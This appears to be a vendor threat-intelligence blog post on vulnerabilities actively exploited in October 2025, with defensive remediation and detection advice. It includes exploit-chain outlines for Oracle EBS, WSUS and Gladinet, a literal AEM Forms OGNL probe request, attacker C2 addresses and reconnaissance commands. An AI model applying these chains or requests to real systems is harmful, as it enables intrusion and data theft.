October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.

What security teams need to know:

• Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
• CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
• Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting continued risk from unpatched legacy systems
• CWE-287 (Improper Authentication) was the most common weakness type, followed by Out-of-bounds Write and Path Traversal

Bottom line: Don't discount older CVEs. Prioritize based on observed exploitation activity, maintain continuous asset discovery (including legacy systems), and apply compensating controls when immediate remediation isn't possible.

Quick Reference: October 2025 Vulnerability Table

All 32 vulnerabilities below were actively exploited in October.

Table 1: List of vulnerabilities that were actively exploited in September based on Recorded Future data (Source: Recorded Future)

Key Trends: October 2025

Vendors Most Affected

• Microsoft led with 8 vulnerabilities across Windows, WSUS, SMB, and legacy Internet Explorer
• Oracle faced critical exposure through E-Business Suite zero-day exploitation
• Adobe saw two critical flaws in Commerce/Magento and AEM Forms
• Additional affected vendors: Broadcom, XWiki, Dassault Systèmes, Motex, Apple, Kentico, IGEL, SKYSEA, Grafana Labs, Synacor, Linux, Mozilla, GNU, Jenkins, Juniper, Samsung, Smartbedded, and Gladinet

Most Common Weakness Types

• CWE-287 – Improper Authentication
• CWE-787 – Out-of-bounds Write
• CWE-22 – Path Traversal
• CWE-284 – Improper Access Control
• CWE-502 – Deserialization of Untrusted Data
• CWE-119 – Improper Restriction of Operations within Memory Buffer Bounds

Threat Actor Activity

CL0P ransomware group dominated October's threat landscape:

• Exploited CVE-2025-61882 (Oracle EBS zero-day) for data theft and extortion
• Deployed multi-stage Java-based infection chain: GOLDVEIN.JAVA → SAGEGIFT → SAGELEAF → SAGEWAVE
• Targeted executives across industries using compromised third-party email accounts
• Referenced extortion email addresses active on CL0P's data leak site since May 2025

Priority Alert: Active Exploitation

These vulnerabilities are under active exploitation and require immediate attention.

CVE-2025-61882 | Oracle E-Business Suite

Risk Score: 99 (Very Critical) | CISA KEV: Added October 6, 2025

Why this matters: CL0P is actively exploiting this zero-day for data theft campaigns. The vulnerability enables unauthenticated remote code execution through Oracle's Concurrent Processing/BI Publisher integration.

Affected versions: Oracle EBS 12.2.3 through 12.2.14

Immediate actions:

• Apply Oracle's emergency patch released October 4, 2025
• Review logs for requests to /OA_HTML/configurator/UiServlet
• Block known malicious IPs: 200.107.207[.]26 and 185.181.60[.]11
• Monitor for indicators of GOLDVEIN, SAGEGIFT, SAGELEAF, and SAGEWAVE malware

Exposure: ~1,430 Oracle EBS instances visible on Shodan (US, China, Germany, India, UK)

CVE-2025-59287 | Microsoft WSUS

Risk Score: 99 (Very Critical) | Active exploitation confirmed October 24, 2025

Why this matters: Attackers are targeting publicly exposed WSUS instances to achieve remote code execution. Successful exploitation could compromise your entire update distribution infrastructure.

Affected versions: Windows Server 2012 through 2025, including Server 23H2

Immediate actions:

• Install Microsoft's October 14, 2025 security update
• Block inbound connections to TCP ports 8530 and 8531 from untrusted sources
• Monitor for suspicious wsusservice.exe and w3wp.exe activity
• Review logs for Base64-encoded PowerShell commands and unusual curl.exe activity

Exposure: ~25 WSUS hosts remain publicly exposed (per Huntress)

CVE-2025-59230 | Windows RasMan

Risk Score: 99 (Very Critical) | CISA KEV: Added October 14, 2025

Why this matters: This zero-day allows privilege escalation from low-privilege user to SYSTEM-level access. Attackers are chaining this with initial access techniques for full system compromise.

Affected versions: Windows 10 (1607, 1809, 21H2, 22H2), Windows 11 (22H2–25H2), Windows Server 2008–2025

Immediate actions:

• Apply Microsoft's October 14, 2025 patch
• Disable RasMan service if not required
• Review past 30 days of logs for suspicious rasman.exe activity
• Implement LAPS and enforce MFA

Technical Deep Dive: Exploitation Analysis

Security practitioners and incident responders can get technical detailed analysis with the following information:

CL0P's Oracle E-Business Suite Campaign

On October 6, 2025, Mandiant's CTO issued an alert detailing CL0P's exploitation of CVE-2025-61882. The vulnerability stems from a chain of flaws that, when combined, enable unauthenticated remote code execution.

The exploitation chain:

• SSRF via UiServlet – Crafted XML payload to /OA_HTML/configurator/UiServlet initiates arbitrary outbound HTTP requests
• CRLF header injection – Attacker-controlled headers added to outgoing requests
• HTTP keep-alive abuse – Persistent connections chain multiple backend requests
• Path traversal – Bypasses authentication filters to reach internal JSP endpoints
• XSL template injection – Coerces JSP to fetch attacker-controlled stylesheet, executing Java extension functions for RCE

Observed post-exploitation activity:

According to GTIG and Mandiant's analysis, the threat actor:

• Distributed extortion emails targeting executives across industries
• Used compromised third-party email accounts (likely from infostealer logs)
• Deployed GOLDVEIN.JAVA to fetch second-stage payloads from C2 servers (162[.]55[.]17[.]215 and 104[.]194[.]11[.]200)
• Installed SAGEWAVE servlet filter for persistent backdoor access
• Executed reconnaissance commands: cat /etc/fstab, df -h, ip addr, netstat -an

Related Insikt Group® analysis: TTP Instance: Oracle EBS Exploitation Prior to CL0P's Extortion Campaign

Microsoft WSUS Deserialization Attack (CVE-2025-59287)

HawkTrace's October 18 analysis revealed the root cause: unsafe deserialization in the WSUS API's EncryptionHelper.DecryptData() method.

Technical breakdown:

The vulnerability allows attackers to embed malicious serialized objects in SOAP messages sent to ClientWebService.asmx. The WSUS server:

• Decrypts AuthorizationCookie data using AES-128-CBC
• Deserializes the result using .NET's BinaryFormatter.Deserialize() without validation
• Executes attacker-controlled code within the WSUS service context

Observed attack pattern (per Huntress):

• Targeting publicly exposed WSUS on ports 8530/8531
• Crafted POST requests trigger deserialization via AuthorizationCookie
• cmd.exe and PowerShell.exe spawn from wsusservice.exe and w3wp.exe
• Data exfiltration via HTTP requests and curl.exe to attacker-controlled webhooks

Windows RasMan Privilege Escalation (CVE-2025-59230)

Cyberthint's analysis details how insufficient access validation in the RasMan service enables privilege escalation.

Attack chain scenario:

• Initial access – Phishing, RDP brute-force, or weak credentials
• Privilege escalation – Exploit CVE-2025-59230 to gain SYSTEM
• Persistence – Create services or scheduled tasks
• Lateral movement – Use credentials for network propagation
• Impact – Ransomware deployment, data exfiltration, or service disruption

Adobe AEM Forms RCE (CVE-2025-54253)

Searchlight Cyber's July 29 disclosure revealed a pre-authentication Struts2 DevMode chain enabling unauthenticated OGNL execution.

Key details:

• Authentication bypass via URLs containing login. (passes com.adobe.framework.SecurityFilter)
• Struts DevMode enabled (struts.devMode="true") permits OGNL evaluation
• Simple exploitation: GET /adminui/updateLicense1.do;login.?debug=command&expression=7*7

Exposure: ~418 AEM instances on Shodan (US, Australia, Germany, Canada, Ireland)

Remediation: Upgrade to AEM version 6.5.0-0108 or later

Gladinet CentreStack/Triofox LFI (CVE-2025-11371)

Huntress's October 15 report documented active exploitation of this local file inclusion vulnerability.

Why it's dangerous: When chained with CVE-2025-30406, attackers achieve RCE via ViewState deserialization.

Observed attack pattern:

• LFI via /storage/t.dn endpoint to exfiltrate Web.config
• Extract ASP.NET machineKey from config
• Craft signed ViewState payloads for command execution
• Execute commands, redirect output to file, retrieve via same LFI

Remediation: Upgrade to version 16.10.10408.56683+

Exposure: ~1,528 CentreStack instances on Shodan (US, China, Germany, UK, Singapore)

Detection & Remediation Resources

Nuclei Templates from Insikt Group®

Recorded Future customers can access Nuclei templates.

Note: All templates are designed for authorized environments only and do not modify system state.

Recorded Future Product Integrations

• Vulnerability Intelligence – Prioritize by exploitation likelihood, not just severity
• Attack Surface Intelligence – Identify internet-facing assets vulnerable to specific CVEs
• Third-Party Intelligence – Assess vendor security posture without manual research

October 2025 Summary

October's vulnerability landscape reinforced critical lessons for security teams:

Legacy systems remain high-value targets. Five of the 14 RCE-enabling vulnerabilities are over a decade old. Attackers continue exploiting unpatched legacy systems and internet-facing applications.

Zero-days demand rapid response. CL0P's exploitation of CVE-2025-61882 within days of disclosure demonstrates the shrinking window between vulnerability publication and weaponization.

Authentication flaws dominate. CWE-287 (Improper Authentication) was the most common weakness type—a reminder that identity and access controls remain foundational security priorities.

Take Action

Ready to see how Recorded Future can help your team prioritize vulnerabilities, detect active exploitation, and reduce risk across your attack surface? Check out our demo center. Or, dive into more Insikt Group research.

About Insikt Group®:

Recorded Future’s Insikt Group® threat research team is comprised of analysts, linguists, and security researchers with deep government and industry experience.

Insikt Group® publishes threat intelligence to the Recorded Future analyst community in blog posts and analyst notes.